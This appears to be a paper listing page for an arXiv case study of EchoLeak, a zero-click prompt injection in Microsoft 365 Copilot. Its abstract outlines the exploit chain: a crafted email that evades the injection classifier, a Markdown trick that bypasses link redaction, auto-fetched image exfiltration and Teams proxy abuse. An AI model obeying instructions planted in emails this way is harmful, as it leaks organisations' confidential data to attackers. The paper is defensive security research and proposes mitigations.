attack 2025

EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System

Pavan Reddy , Aditya Sanjay Gujral

The George Washington University

0 citations
α

Published on arXiv

2509.10540

Prompt Injection

OWASP LLM Top 10 — LLM01

Sensitive Information Disclosure

OWASP LLM Top 10 — LLM06

Key Finding

A single crafted email coerces Microsoft 365 Copilot into exfiltrating internal organizational data to an attacker server with zero user interaction, bypassing all deployed prompt injection defenses via a four-stage exploit chain.

EchoLeak

Novel technique introduced

Large language model (LLM) assistants are increasingly integrated into enterprise workflows, raising new security concerns as they bridge internal and external data sources. This paper presents an in-depth case study of EchoLeak (CVE-2025-32711), a zero-click prompt injection vulnerability in Microsoft 365 Copilot that enabled remote, unauthenticated data exfiltration via a single crafted email. By chaining multiple bypasses-evading Microsofts XPIA (Cross Prompt Injection Attempt) classifier, circumventing link redaction with reference-style Markdown, exploiting auto-fetched images, and abusing a Microsoft Teams proxy allowed by the content security policy-EchoLeak achieved full privilege escalation across LLM trust boundaries without user interaction. We analyze why existing defenses failed, and outline a set of engineering mitigations including prompt partitioning, enhanced input/output filtering, provenance-based access control, and strict content security policies. Beyond the specific exploit, we derive generalizable lessons for building secure AI copilots, emphasizing the principle of least privilege, defense-in-depth architectures, and continuous adversarial testing. Our findings establish prompt injection as a practical, high-severity vulnerability class in production AI systems and provide a blueprint for defending against future AI-native threats.

Key Contributions

  • First documented zero-click indirect prompt injection exploit in a production LLM system (CVE-2025-32711), chaining XPIA classifier evasion, reference-style Markdown redaction bypass, auto-fetched image exfiltration, and CSP-allowed Teams proxy abuse for unauthenticated data theft
  • Root-cause analysis of why existing LLM defenses (prompt injection classifiers, link redaction, content security policies) failed to prevent the exploit chain
  • Generalizable mitigation framework including prompt scope partitioning, provenance-based access control, enhanced I/O filtering, and strict CSP design for production AI copilots

🛡️ Threat Analysis

Details

Domains
nlp
Model Types
llm
Threat Tags
black_boxinference_timetargeted
Applications
enterprise ai assistantsmicrosoft 365 copilot
Read PDF arXiv

Similar Papers

attack

OMNI-LEAK: Orchestrator Multi-Agent Network Induced Data Leakage

2026 0 cit.
100%
attack

Tricking LLM-Based NPCs into Spilling Secrets

2025 0 cit.
100%
attack

CLIOPATRA: Extracting Private Information from LLM Insights

2026 0 cit.
100%
attack

Bypassing Prompt Guards in Production with Controlled-Release Prompting

2025 1 cit.
100%
attack

Whispers of Wealth: Red-Teaming Google's Agent Payments Protocol via Prompt Injection

2026 0 cit.
100%
attack

External Data Extraction Attacks against Retrieval-Augmented Large Language Models

2025 1 cit.
93%
attack

Prompt-in-Content Attacks: Exploiting Uploaded Inputs to Hijack LLM Behavior

2025 0 cit.
93%
attack

Just Ask: Curious Code Agents Reveal System Prompts in Frontier LLMs

2026 0 cit.
92%